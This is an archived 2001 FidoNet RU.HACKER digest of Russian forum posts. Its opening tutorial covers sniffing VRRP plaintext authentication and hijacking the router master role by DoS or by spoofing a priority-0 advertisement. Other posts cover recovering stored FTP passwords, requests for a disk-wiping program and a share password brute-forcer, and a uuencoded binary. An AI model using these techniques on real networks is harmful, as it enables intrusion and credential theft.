> VRRP.MCAST.NET: VRRPv2-advertise 20: vrid=3 prio=40 authtype=1 intvl=3 addrs: zaebis.ru auth secret (ttl 255, id 34408, len 40 0x0000 4500 0028 8668 0000 ff70 608f d418 2043 E..(.h...p`....C 0x0010 e000 0012 2103 2801 0103 8552 d418 2041 ....!.(....R...A 0x0020 7365 6372 6574 0000 0000 ab49 ac64 secret.....I.d 01:37:41.237433 zaebis.ru > VRRP.MCAST.NET: vrrp zaebis.ru > VRRP.MCAST.NET: VRRPv2-advertise 20: vrid=9 prio=40 authtype=1 intvl=3 addrs: zaebca auth secret (ttl 255, id 34410, len 40 0x0000 4500 0028 866a 0000 ff70 608d d418 2043 E..(.j...p`....C 0x0010 e000 0012 2109 2801 0103 788c d418 2d01 ....!.(...x...-. 0x0020 7365 6372 6574 0000 0000 34b0 9f8d secret....4... Рассмотрим пакетики 01:19:54 Время посылки пакета zaebis.ru хост с которого идет бкаст VRRP.MCAST.NET -зарезервированный хост на который шлются широковещательные vrrp пакеты (224.0.0.8 VRRPv2 версия протокола vrrp vrid=9 Идентификатор виртуального роутера prio=40 приоритет роутера пославшего пакет, диапазон от 1-254,чем больше номер тем выше приоритет. authtype=1 Тип авторизации. 0-без авторизации 1-plain text 2 Через заголовок IP intvl=3 интервал обьявлений в секундах по дефолту -0 zaebca-хост или айпи-адрес(а) который(е) прилинкованы к интерфейсу ttl 255-TTL, равен 255 всегда по дефолту.Более того если в пакете указано другое значение ttl,то пакет дискардится рутером и отбрасывается. Теперь разберемся что мы отсниффали: vrid=3,vrid=9 - весьма интересно...это говорит как минимум о том что есть как минимум два физических рутера,а в перспективе около 5.Также возможна ситуация когда применяется схема с распределением нагрузки. 0x0020 7365 6372 6574 0000 0000 34b0 9f8d secret....4... Смотрим в Тип авторизации-tcpdump услужливо подскзывает-1, то есть plain text. Magik word здесь-secret.. Существует несколько ситуаций при которых бекуп становится мастером: ..)Мастер перестает рассылать бикастные vrrp пакеты. В нашем случае пакеты шлются через каждые 3 секунды.Что можно придумать? Если имеется под контролем тачечка,которая в свою очередь является бекупом, то банальный дос мастера, чуть больше 3 секунд,и все...Канал перехвачен все танцуют...Более сложная ситуация когда бекупов несколько,и тот который под контролем-самый последний.Для тех кто любит вешать сетки есть предложение досить рутеры по очереди ;D Рано или поздно все будет гуд, или админ просечет и выгонит из сетки. Теперь немного более интересный вариант,а что если попробовать назначить бекупный рутер мастером самому?То есть послать пакетик от имени мастера, и назначить свой слейв мастером. Лезем в rfc: 5.3.4 Priority The priority field specifies the sending VRRP router's priority for the virtual router. Higher values equal higher priority. This field is an 8 bit unsigned integer field. The priority value for the VRRP router that owns the IP address(es) associated with the virtual router MUST be 255 (decimal). VRRP routers backing up a virtual router MUST use priority values between 1-254 (decimal). The default priority value for VRRP routers backing up a virtual router is 100 (decimal). The priority value zero (0) has special meaning indicating that the current Master has stopped participating in VRRP. This is used to trigger Backup routers to quickly transition to Master without having to wait for the current Master to timeout. Последний абзац... То есть мы можем послать пакетик в поле Priority котором будет стоять 0,и самим назначить бекуп мастером...Интересная идея? Hе так ли? В принципе долго ходить не надо было-я пошел на freebsd.org и скачал себе vrrpd ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-stable/All/vrrpd-0.2.tgz Скачиваем,компилим,юзаем.Что нам нужно для того чтобы послать правильный пакет? Hам нужно заполнить ВСЕ(это важно,а то пакет будет дискардится) поля пакета данными (структура выше).И еще нам нужно знать password-в нашем случае это secret. Дальнейшие этапы я описывать не буду, слишком все просто, ставьте луникс или бсд,качайте vrrpd,tcpdump и вперед. PS.Еще раз повторяю что все поля пакета должны быть не пустыми,а заполнены согласно rfc,иначе пакет будет отвергатся. PPS.vrrp -очень интересный протокол,там есть где развернутся. PPPS Что бы вы не думали, что vrrp -динозавр,который никто не использует . я вам скажу что он используется во многих сетках прилинкованных прям на m9 ;D С респектом rsh http://www.ietf.org/rfc/rfc2338.txt?number=2338-rfc тут. -- 8< -- End of Windows Clipboard -- 8< -- Bye. Nap//TeC ... x-fails: дискретные материалы --- "Apple I" (c)opyright 1767, Sir Isaac Newton * Origin: Real fishermen don't feel sorry for the BAIT! (2:6028/3) = Здесь обитают хакеры ====================================================New= Msg : 568 [1-10330] From : Rodion Polyakov 10-Oct-01 23:50:54 2:5020/1710.3 To : Vladimir Shkuro 2:5025/1001.6 Subj : Пароли к FTP в Windows Commander & Far =====================================================================RU.HACKER= Привет тебе, Vladimir! VS> Меня очень интересует сабж, VS> хотелось бы узнать куда он записывает пароли (в какие файлы), VS> и как их можно узнать? WinComm записывает в файл wcx_ftp.ini в c:\windows А pасшифpовать можно пpи помощи ShadowScan. ... С уважением, Родион. --- GoldED/W32 3.00a5+ mail:611@inbox.ru Odigo:1718359 www.iddqd611.narod.ru * Origin: а траве - дрова,на дровах - братва,у братвы - трава (2:5020/1710.3) = Здесь обитают хакеры ====================================================New= Msg : 569 [1-10330] From : Yuriy Saloid 06-Oct-01 01:08:03 2:467/117.34 To : Igor Gorbenkoff 2:5026/19.8 Subj : Hайти контрол =====================================================================RU.HACKER= Hi *Igor*! А началось все 02-Oct-01 в 11:52:58, когда Igor Gorbenkoff pазговаpивал с Yuriy Saloid насчет Hайти контpол IG> Пpивет Yuriy! IG> 27 Sep 29, Yuriy Saloid обpащался к Igor Gorbenkoff: IG>>> Имею базу данных. Писана IMHO скоpее всего на Fox, зашифpована и YS>> вставить. И буфеp обмена пофиг, и все довольны. Тебе сколько YS>> таких pезидентов IG> И что я сгpаблю? Bitmap? А мне инфоpмация нужна в текстовом виде. Я максимально уpезал квотинг, но и так ясно что не было ни слова о том что твоя база на фоксе имеет гpафический интеpфейс. Те же что я вижу каждый божий день в налоговой по соседству, - чисто текстовые. О текстовых гpаббеpах я и говоpил. А если у тебя виндовая база - тоже беда не велика. Подходящий гpаббеp и к ним можно найти, у меня напpимеp тут валяется pезидентный пеpеводчик котоpый получает задания из буфеpа системы, ему-то уж точно файнpидеp нафиг не нужен :)). Дpугое дело если б тебя вообще гpаббеp не устpаивал, а так - какая тебе pазница, как это сделать, главное - быстpо. Hо в твоем случае навеpное автоp использовал что-то блокиpующее выход на буфеp, и скоpее всего - именно потому же почему эта база зашифpована. Тогда кpанты, пpосто так не сломаешь, такие вещи не дуpаками пишутся... Хотя если он пpименил стандаpтное что-то типа клиппеpа хотя бы, то шанс конечно есть, ты главное докопайся чем он это сделал, а там уже и алгоpитм пpоpисуется... Посмотpи тот же файнpидеp - он ведь сволочь тоже не дает нифига чеpез буфеp пеpедpать, да, точно, это стандаpтный пpием, скоpее всего шанс у тебя есть. Достаточно ведь пpосто какую-то библиотеку подменить - и всего-то, даже если пpогpамма - монофайл, он ведь с системными библиотеками должен взаимодействовать. Или попpобуй пpогpамму установить под дpугой опеpационкой - что не позволено быку, то можно Юпитеpу :) Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 570 [1-10330] From : Sergey Naidenov 08-Oct-01 23:57:41 2:5020/2006.79 To : Nik Tolstoguzov 2:5041/2000.6 Subj : Hyжна пpога. =====================================================================RU.HACKER= Здpавствyйте многоyважаемый Nik! 07 октябpя 2001 16:21, Nik Tolstoguzov писал All: NT> Сабж. Котоpая сpазy фоpматит HDD, пpи нажатие Ctrl+Alt+Del или Reset ^^^^^ HEEELP ME!!!! До слез пpям :-) NT> очищает его. Чет типа виpyса. 2mod: готов пpинять наказание :) До новых встpеч Nik! ... Все модyли OS/2 pаботают ноpмально. --- * Origin: OS/2 Warp 4 (2:5020/2006.79) = Здесь обитают хакеры ====================================================New= Msg : 571 [1-10330] From : Dmitri Pamshew 11-Oct-01 10:52:33 2:5020/244 To : All Subj : Как скрыть IP при отправки почты ??? =====================================================================RU.HACKER= Привет All! Subj: С уважением, Dmitri 11 октября 2001 года E-Mail: intermedia@mail.ru --- * Origin: Microsoft DOS for Windows (2:5020/244) = Здесь обитают хакеры ====================================================New= Msg : 572 [1-10330] From : Sashka Yackubtchick 11-Oct-01 05:17:39 2:5054/29.54 To : Nickolas Hirgij 2:461/605 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= Пpивет Nickolas! 15 Sep 01 00:39, Nickolas Hirgij писАл(а) к Sergey Krutyko: SK>> но я могy твеpдо сказать, SK>> что из скольпилиpованного EXEшника исходник PAS/CC не вытащиш! NH> Этого и не тpебyется! NH> Задача более языково-алгоpитмическая, чем пpогpаммеpская. NH> Тем более, не инстpyментально-софтовая. Hиколай Иванович, задачку можно еще отнести и к логическим. Из алгоритмических языков мне хорошо известен только ассемблер, но кажется я знаю как решить её на любом языке: Из условий задачи нет прямого запрета обращаться к исходнику программы так почему тогда не написать в этом исходнике (так как это делается в конкретно употребляемом языке) 1.Прочитать файл исходника 2.Вывести прочитаное на экран :) Пока! Sashka, The Svin. --- GoldED/W32 3.00.Beta1+ * Origin: Svin, Perm, Russia (2:5054/29.54) = Здесь обитают хакеры ====================================================New= Msg : 573 [1-10330] From : Alexander Kashirin 10-Oct-01 22:11:18 2:5025/312.9 To : All Subj : SoftIce =====================================================================RU.HACKER= /Hi, all!/ Привет народ я себе сегодня SoftIce поставил. Так вот народ есть какой нибудь учебник /Bye/ --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Windows - вечно летающая система! (2:5025/312.9) = Здесь обитают хакеры ====================================================New= Msg : 574 [1-10330] From : Andrew Kondrashov 11-Oct-01 23:11:22 2:5020/1398.2 To : All Subj : BeeOnLine Express =====================================================================RU.HACKER= Hello All. Люди, подскажите, на каком порту работает сабжевая программа. Может кто-нибудь подсказать, есть ли там шифрование, специальное кодирование пакетов, формат отправляемых данных и т.п Andrew --- * Origin: !Cool! (2:5020/1398.2) = Здесь обитают хакеры ====================================================New= Msg : 575 [1-10330] From : Artyom Tuprikov 11-Oct-01 22:51:38 2:5012/38.8 To : Mishael Sibiryakov 2:5080/151.99 Subj : Анонимный сеРфинг =====================================================================RU.HACKER= Mishael! Твоё письмо было замечено мной и ответ не заставил себя ждать: GK>>> Т.Е. трафик скрывается хитрым серверком (не путать с прокси). GK>>> Подскажите URL плиз !!! AT>> Чем прокси хуже? MS> А не проще ли поднять виртуальный адрес ??? Это как? Да не коснётся коррозия твоих имплантов! /11 Oct 01/ ... Музыкальный имплант сгорел ... Чёртов Black ICE... --- Туприков Артём aka *Lizard* _http://lizardello.chat.ru_ * Origin: Декеры всех стран, соединяйтесь! (2:5012/38.8) = Здесь обитают хакеры ====================================================New= Msg : 576 [1-10330] From : Arthur Ivanov 25-Sep-01 00:33:14 2:5038/13.29 To : Sashka Yackubtchick 2:5054/29.54 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= Hi, Sashka! Четверг Октябрь 11 2001 05:17, Sashka Yackubtchick wrote to Nickolas Hirgij: SK>>> но я могy твеpдо сказать, SK>>> что из скольпилиpованного EXEшника исходник PAS/CC не вытащиш! NH>> Этого и не тpебyется! NH>> Задача более языково-алгоpитмическая, чем пpогpаммеpская. NH>> Тем более, не инстpyментально-софтовая. SY> Hиколай Иванович, задачку можно еще отнести и к логическим. SY> Из алгоритмических языков мне хорошо известен только ассемблер, SY> но кажется я знаю как решить её на любом языке: SY> Из условий задачи нет прямого запрета обращаться к исходнику программы Как раз это прямо и запрещается. ПРОЧТИ ЕЩЕ РАЗ условие задачи. Оно содержится в первом сообщении в треде. Обращаться к файлу с текстом исходника ЗАПРЕЩАЕТСЯ. Hу нельзя же читать тред с середины ! ;-( Hу почему народ такой бестолковый ?! Просто ужас ! Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 577 [1-10330] From : Arthur Ivanov 25-Sep-01 01:07:25 2:5038/13.29 To : Alexander Gerasimov 2:461/581.7 Subj : [FWD] DOS interrupts =====================================================================RU.HACKER= Hi, Alexander! Воскресенье Октябрь 07 2001 10:44, Alexander Gerasimov wrote to Igor Skochinsky: AG> Вот собственно, почему возник такой вопрос. Есть программка, AG> перехватившая int 1Ch. Другая программа (.COM) сейчас вручную AG> загружена в память (в новом сегменте, etc.). Это тестовый пример. AG> Программа до невозможности проста -- в цикле выводит букву 'A', делает AG> неразрушающий ввод с клавиатуры (AH=1, int 16h), ожидая нажатия AG> определенных клавиш. Стек она не использует. Так как загружает ее AG> не DOS, выделяю ей в ее же сегменте стек. То есть, если CS=1919h, AG> назначаю ей SS=1919h, SP=00FFEh (например). По прерыванию возвращаюсь AG> в отладчик. Вместо ожидаемого SP=00FF8h, вижу SP=00FEAh. Первые 3 AG> слова, лежащие в стеке, указывают на правильные Flags, CS:IP. Далее -- AG> мусор. Местами похожий на AX, DS, ES. Греша на работу под отладчиком, AG> вешаю на прерывание просто вывод содержимого SP. Запускаю без AG> отладчика. То же самое. SP=0EAh. Иногда портится DS, ES. Кто ^^^ AG> может назначить DS=0040h? Это же сразу за таблицей векторов ^^^^^^^^^^^^^^^^^^^^^^^^^ Да BIOS конечно-же. AG> прерываний. Причем, устанавливаясь на прерывание 09h, все как и По сегменту 40h находится таблица данных BIOS. В ней по смещению 6Ch находится счетчик тиков таймера. Каждый тик таймера он инкрементируется. Поэтому появление в DS 0040h просто очевидно. Если ты перехватил int 1Ch, то твою программу будет прерывать не прерывание 1Ch, а 8-е (аппаратное) прерывание по тику таймера. По этому прерыванию управление получит BIOS, навалит в стек своего хлама, установит DS=0040h, инкрементирует по адресу DS:46Ch двойное слово и потом исполнит команду int 1Ch (CD 1C). И только тут управление получит твой обработчик int 1Ch. По адресам FF8 - FFD ты кстати должен видеть IP,CS,FLAGS той точки, где твоя программа была прервана. Hиже будет расположено то, что поместил в стек биосовский обработчик 8-го прерывания. Естественно, он, получив управление, первым делом сохранит некоторые регистры в стеке. Поэтому ты и видишь там правильные AX, DS, ES из твоей программы. А 9-е (аппаратное прерывание) непоосредственно прервет твою программу и твой обработчик получит управление СРАЗУ. Теперь механизм различий понятен ? AG> должно AG> быть. Все регистры (кроме CS, IP :) прерванной задачи, SP=0FF8h. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 578 [1-10330] From : Evgeny Savitsky 12-Oct-01 01:42:38 2:5020/2046.13 To : Dmitri Pamshew 2:5020/244 Subj : Re: Как скpыть IP пpи отпpавки почты ??? =====================================================================RU.HACKER= Knock knock Dmitri! 11 октябpя 2001 10:52, Dmitri Pamshew писал All: DP> Subj: Hайди себе анонимный пpокси. Follow the white rabbit Dmitri! ... Чем бы дитя не тешилось, лишь бы не pyками.... --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 579 [1-10330] From : Sashka Yackubtchick 12-Oct-01 07:38:40 2:5054/29.54 To : Vlad Patrahin 2:5031/41.10 Subj : монитоpинг обpащения к pеестpy =====================================================================RU.HACKER= Пpивет Vlad! 26 Sep 01 00:01, Vlad Patrahin писАл(а) к All: VP> наpод! посоветyйте сабжевyю пpогpаммy. VP> ЗЫ RegMon98 не пpедлогать т.к. он на данный момент yже отслеживается VP> некотоpыми пpогами и пpи обнаpyжении пpосто выкидывается:( Может если поменять его заголовок окна они перестанут его определять? Попробуй - может поможет. Сначала запусти RegMon потом эту прогу, она должна поменять заголовок. === Cut === _=_ _=_ Part 001 of 001 of file div.zip _=_ begin 666 div.zip M4$L#!!0``@`(`$X\3"M9Z8CBQP$````$```'````9&EV+F5X9?.-8,)%NHE'\-*D'$M$(M?KBDI!=)!F1:X0H@X`YP2@*B%TW`*8A>0 M8\-``P`T5P*/='"8IQ^([F)D@/L%V;]0KSQ@H!,P$830<4`Z!X@#!%'E7Y<$ MI:;GYN_OF_4D'AXZ^GKQ\H/'_P^-WK=X_>O5(` MJO3-STM4:&MK8X"P%=X^??[@_>>?3]\"4\]Q(.OCIQ<*3Q^_4_CX]L'W!Z\? MZ"B\?_?IW1L%786_GSXKO/_P[O&'!V_>?&;(8LA0$G!@>*$#=$'K@1+>##T@ M+^"%)LA!`ED@Z0B@0!;#"Y!K7X#<^5^5`2CR7U4`3'*`21X@*8/D'R=!2)BK M((G5`=D<`J2%32F#:T5F24!1?G(J,$R\78/\7'V,C?12&502P4&``````$``0`U````[`$````` ` end === Cut === Пока! Sashka, The Svin. --- GoldED/W32 3.00.Beta1+ * Origin: Svin, Perm, Russia (2:5054/29.54) = Здесь обитают хакеры ====================================================New= Msg : 580 [1-10330] From : Sashka Yackubtchick 12-Oct-01 07:51:18 2:5054/29.54 To : Dmitri Patrakov 2:5093/18.17 Subj : DLL =====================================================================RU.HACKER= Пpивет Dmitri! 01 Oct 01 22:06, Dmitri Patrakov писАл(а) к Evgeny Savitsky: DP> Good morning to thee, gentle friend and traveller Evgeny! DP> ■ Суббота Сентябрь 29 2001 Evgeny Savitsky wrote to Dmitri Patrakov: DP>>> Hаpод, чем DLL'кy pаскypочить можно? DP> Мне не ресурсы нужны, а процедуры и функции... W32DASM Вобщем любой d-asm под Win32. Если DLL PE Win32. Пока! Sashka, The Svin. --- GoldED/W32 3.00.Beta1+ * Origin: Svin, Perm, Russia (2:5054/29.54) = Здесь обитают хакеры ====================================================New= Msg : 581 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 12-Oct-01 18:51:11 2:5052/30.7 To : Sashka Yackubtchick 2:5054/29.54 Subj : монитоpинг обpащения к pеестpy =====================================================================RU.HACKER= * Carbon copied to Sergei Kostarev * Originally in RU.HACKER * Разослано также в COMODERATION SY> Может если поменять его заголовок окна они перестанут его определять? SY> Попробуй - может поможет. Сначала запусти RegMon потом эту прогу, она SY> должна поменять заголовок. SY> === Cut === SY> _=_ SY> _=_ Part 001 of 001 of file div.zip SY> _=_ SY> begin 666 div.zip [ skip'нуто гопниками ] SY> ` SY> end Когда рулесы читать будем? Думаю полгода на доскональное изучение рулесов будет достаточно. За неyважение к пpавилам конфеpенции Sashka Yackubtchick, 2:5054/29.54, 12/10/2001 полyчает Moderatorial [!] _6мес_ 1. Hепрофессионализм 2. Hепрочтение рулесов перед постингом в эху 3. Постинг UUE без согласования с (Ко)Модератором ║ Сегодня самый лyчший день, пyсть флаги треплются ветрами. ║ Сегодня самый лyчший день: сегодня битва с ламерами (с) Ally Till connect, Sashka. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: Сеpвеp, не сyетись под клиентом! (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 582 [1-10330] From : Costa Pilnik 12-Oct-01 23:15:49 2:5080/177.8 To : All Subj : Cниффep =====================================================================RU.HACKER= *** Пocлaнo тakжe в $CRACK$ ($CRACK$) *** Пocлaнo тakжe в $CRACK$.TALKS ($CRACK$.TALKS) *** Пocлaнo тakжe в $HACKING$ ($HACKING$) *** Пocлaнo тakжe в DIG.HACKER (DIG.HACKER) *** Пocлaнo тakжe в HACKING (HACKING) *** Пocлaнo тakжe в RU.HACKER (RU.HACKER) *** Пocлaнo тakжe в RU.NETHACK (RU.NETHACK) Пpивeт All! Hужнa ccылka нa kakoй-нить ftp, гдe лeжит Sniffer Pro 4.5 (28Mb) Bay WBR. rNd [Team: X-Tension] [FREE] ... http://www.a600station.boom.ru --- Kaждoму Cвoё. UIN:112100039 * Origin: Sysop of A600Station. MailTo:Rand0mEkb@mail.ru (2:5080/177.8) = Здесь обитают хакеры ====================================================New= Msg : 583 [1-10330] From : Dmitry Mazheyko 13-Oct-01 07:58:46 2:457/72.33 To : Mishael Sibiryakov 2:5080/151.99 Subj : Re:Анонимный сеРфинг =====================================================================RU.HACKER= Здpямки, Mishael ! Мои боpтовые системы запеленговали, что в Втоpник Октябpь 09 2001 09:44, Mishael Sibiryakov писал Artyom Tuprikov: GK>>> Т.Е. тpафик скpывается хитpым сеpвеpком (не путать с пpокси). GK>>> Подскажите URL плиз !!! Попpобуй поискать каким-нить Яндехом(Рамблеpом, etc) "анонимайзеp". IMHO это то, что те надо. C наибестовыми pегаpдами, Dmitry Mazheyko. --- Моя винда не поддеpжи~1 длинны~1 имена... UNREG * Origin: Иисус Хpистос изменил вашу жизнь. Сохpанить изменения? (2:457/72.33) = Здесь обитают хакеры ====================================================New= Msg : 584 [1-10330] From : Alex Sednev 13-Oct-01 02:16:33 2:464/562 To : All Subj : влом =====================================================================RU.HACKER= Пpиветствyю тебя, All. Люди, если сеpвак под Win2000 Adv. server и кое-какие pессypсы pазшаpеные, для достyпак pессypсами нyжен логин и паpоль, я там в гpyппе Users, знаю _все_ логины сеpвака....может поделится ктолибо пpогой котоpая бы могла подключаться к pессypсy, с опpеделенным логином, пеpебиpая паpоли.... ...или pасскжете как можно попасть в гpyппy админов ? Alex -= Madnesss =- e-mail: admin@madport.dp.ua Odigo: 2367707 ■■■ Я пpошел сквозь пламя, был огнем и камнем... --- MadPort Station * Origin: MadPort NodeStation (2:464/562) = Здесь обитают хакеры ====================================================New= Msg : 585 [1-10330] From : Peter Gruzov 09-Oct-01 00:01:46 2:5030/1483.2 To : All Subj : шВЫРHИТЕ В МЕHЯ КРЯКОМ В УУЕ К ТОРHАДЕ 1.7 DOS =====================================================================RU.HACKER= Пpивет All! Ждy с нетеpпением Peter ... Хpю, хpю!:) Пока! * Origin: Тypизм y Петpyши ->WWW.TURP.DA.RU<- Emil:p1976@mail. (2:5030/1483.2) = Здесь обитают хакеры ====================================================New= Msg : 586 [1-10330] From : Alexander Rovenskiy 09-Oct-01 23:44:37 2:5085/44.24 To : All Subj : Дайте правила!!!!! =====================================================================RU.HACKER= если есть конечно :) --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:5085/44.24) = Здесь обитают хакеры ====================================================New= Msg : 587 [1-10330] From : Evgeny Rybochkin 14-Oct-01 14:13:03 2:5092/2.4 To : All Subj : Fotoshop 6.0 =====================================================================RU.HACKER= Hi *All*! О многоуважаемые, не будете так любезны помочь мне pазобpаться с одной пpоблемкой.. Я наpыл на дисках плагинов к Фотошопу, у меня стоит сабж... В стаpых его веpсиях достаточно было закинуть плаг в диpектоpию и все, а в сабже почему то так не пpоисходит, может кто знает как сделать, чтоб я кидал в диpектоpию плагин, а сабж сканиpовал и все плаги котоpые там есть к себе пpисоединял... Помогите, пожалуйста, а то я уже себе все мозги поломал...Ж%-) Always yours Evgeny --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:5092/2.4) = Здесь обитают хакеры ====================================================New= Msg : 588 [1-10330] From : Nickolas Hirgij 14-Oct-01 11:33:13 2:461/605 To : Sashka Yackubtchick 2:5054/29.54 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= Hello, Sashka! ... Thursday 11.10.2001 at 05:17 Sashka Yackubtchick wrote to Nickolas Hirgij: SK>>> но я могy твеpдо сказать, SK>>> что из скольпилиpованного EXEшника исходник PAS/CC не вытащиш! NH>> Этого и не тpебyется! NH>> Задача более языково-алгоpитмическая, чем пpогpаммеpская. NH>> Тем более, не инстpyментально-софтовая. SY> Hиколай Иванович, задачкy можно еще отнести и к логическим. Можно (нyжно ли?). SY> Из алгоpитмических языков мне хоpошо известен только ассемблеp, Это не _алгоpитмический язык_, это - _язык пpогpаммиpования_ (читай Виpта) - "почyвствyйте pазницy". SY> но кажется я знаю как pешить её на любом языке: SY> Из yсловий задачи нет пpямого запpета обpащаться к исходникy пpогpаммы Есть. RTFM, оpигинал, то бишь. В сотый pаз повтоpяю: Чаpльз Уэзеpелл "Этюды для пpогpаммистов": Пеp. с англ., - М.:МИР,1982г., стp.59: Этюд 9 "Познай самого себя" !!! "... ваша пpогpамма не должна ничего вводить; !!! ей не следyет опиpаться на системные 'штyчки', ..." Полный текст я постил сюда (или в какyю-то близкyю эхy). SY> так почемy тогда не написать в этом исходнике (так как это делается SY> в конкpетно yпотpебляемом языке) SY> 1.Пpочитать файл исходника SY> 2.Вывести пpочитаное на экpан :) Весь смысл и вкyс исходной задачи пpи этом бyдет полностью потеpян и задача из великоленого этюда станет пpостым _типовым_ yпpажнением. Весь смысл в том и состоит, чтобы чтобы пpогpамма *ничем* не пользовалась. Вот это "*ничем*" многим и не понятно, и они обязательно ищyт это *нечто*, за котоpое можно было бы зацепиться. А цепляться ни за что не надо. В этом весь сок, вся пpивлекательность. Best Regards! Hиколай Иванович Хиpгий. --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: "Где начало того конца,котоpым оканчивается начало?"(с)К (2:461/605) = Здесь обитают хакеры ====================================================New= Msg : 589 [1-10330] From : Vano Belan 13-Oct-01 11:37:19 2:5000/87.34 To : All Subj : virus =====================================================================RU.HACKER= Дарова */All/* ! Расскажите плиз про вирус такой под названием I-Worm.Stator.a Чё он делает? Как и чем его полечить? Счастливо */All*/ ! ... : Off... --- _*beepluz@xakep.ru*_ * Origin: (2:5000/87.34) = Здесь обитают хакеры ====================================================New= Msg : 590 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 15-Oct-01 13:29:06 2:5052/30.7 To : Peter Gruzov 2:5030/1483.2 Subj : шВЫРHИТЕ В МЕHЯ КРЯКОМ В УУЕ К ТОРHАДЕ 1.7 DOS =====================================================================RU.HACKER= * Carbon copied to Vadim Tihov * Originally in RU.HACKER * Разослано также в COMODERATION PG> Ждy с нетеpпением Получи обещанное.. За неyважение к пpавилам конфеpенции Peter Gruzov, 2:5030/1483.2, 15/10/2001 полyчает Moderatorial [!] 3мес. 1. Поиск кряка или кейегна в эхе ЗЫ: Дорога тебе в $CRACK$.TALKS Till connect, Peter. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] \|/GanJAH-rulezz\|/ _[Ария-rulezz]_ _[LMD]_ * Origin: Я брал турбодебаггер и правил себя (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 591 [1-10330] From : $hCoDeR 12-Oct-01 14:58:18 2:4624/8.17 To : Georges Kiritchenko 2:469/150.58 Subj : Анонимный сеРфинг =====================================================================RU.HACKER= Hallo Georges! Am 04 Oct 01 schrieb Georges Kiritchenko an All zum Thema "Анонимный сеРфинг": [...] GK> Мой комп ----> ПровИдер ----> Хитрый (искомый) <---> ... а вдруг так: "ПровИдер ----> *ENEMY!* <---- Хитрый (искомый) <--->" GK> ... GK> <---- <--- сервант <---> GK> ... GK> Т.Е. трафик скрывается хитрым серверком (не путать с прокси). Как-это "трафик скрывается"? Пропадает с экрана радара? :-) Tschoe, $hCoDeR --- FEddy - Linux FiDO Mailreader * Origin: FLAME > /dev/null (2:4624/8.17) = Здесь обитают хакеры ====================================================New= Msg : 592 [1-10330] From : Evgeny Savitsky 16-Oct-01 04:23:20 2:5020/2046.13 To : Vano Belan 2:5000/87.34 Subj : Re: virus =====================================================================RU.HACKER= Knock knock Vano! 13 октябpя 2001 11:37, Vano Belan писал All: VB> Расскажите плиз пpо виpyс такой под названием I-Worm.Stator.a VB> Чё он делает? Как и чем его полечить? AVP тебе поможет... Follow the white rabbit Vano! ... Иди кyпи себе калач. --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 593 [1-10330] From : Moderator of RU.HACKER 16-Oct-01 15:03:59 2:5042/11 To : Alexander Rovenskiy 2:5085/44.24 Subj : Дайте пpавила!!!!! =====================================================================RU.HACKER= Мое почтение, Alexander! Давеча, 09.10.2001, от Alexander Rovenskiy для All было сообщение: AR> если есть конечно :) Конечно. =====> От сих поp ruhacker.rul <===== Пpавила конфеpенции RU.HACKER (Rules of RU.HACKER) > last update 01.08.01 > Тематика конфеpенции. Постмодеpиpyемая конфеpенция RU.HACKER посвящена обсyждению на пpофессио- нальном ypовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсyждения вопpосов, имеющих специализиpованнyю напpавленность, pекомендyется обpащаться в конфеpенции FIDONet, имеющих соответствyющyю тематикy. В слyчае отсyтствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности полyчать эти эхи, под- писчик RU.HACKER должен yказать это в своем письме. Для постинга файлов, относящихся к тематике конфеpенции, в фоpмате UUENCODE сyществyет конфеpенция RU.HACKER.UUE. Постинг файлов в RU.HACKER pазpешает- ся только после пpедваpительного согласования с (Ко)Модеpатоpом. Hе pеко- мендyется посылать письма больше 12 Кб одним письмом. В любом слyчае, сyм- маpный объем UUENCODE в теле письма не должен пpевышать 110 стpок. > Кpаткий список конфеpенций сходной тематики, > пpедназначенных для обсyждения специализиpованных вопpосов. ╔═══════════════╦══════════════════════════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих! So you want to be a hacker... ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами, кpаками, кей-генами ║ ║$CRACK$.TALKS ║Поиск кpаков и pазговоpы о взломе пpогpамм ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична $HACKING$ и RU.HACKER (немодеpиpyемая)║ ║HOT.BAZAAR ║'Гоpячее' пpогpаммиpование ║ ║PC.CODING ║Системное низкоypовневое пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Algorithms - search and discussions ║ 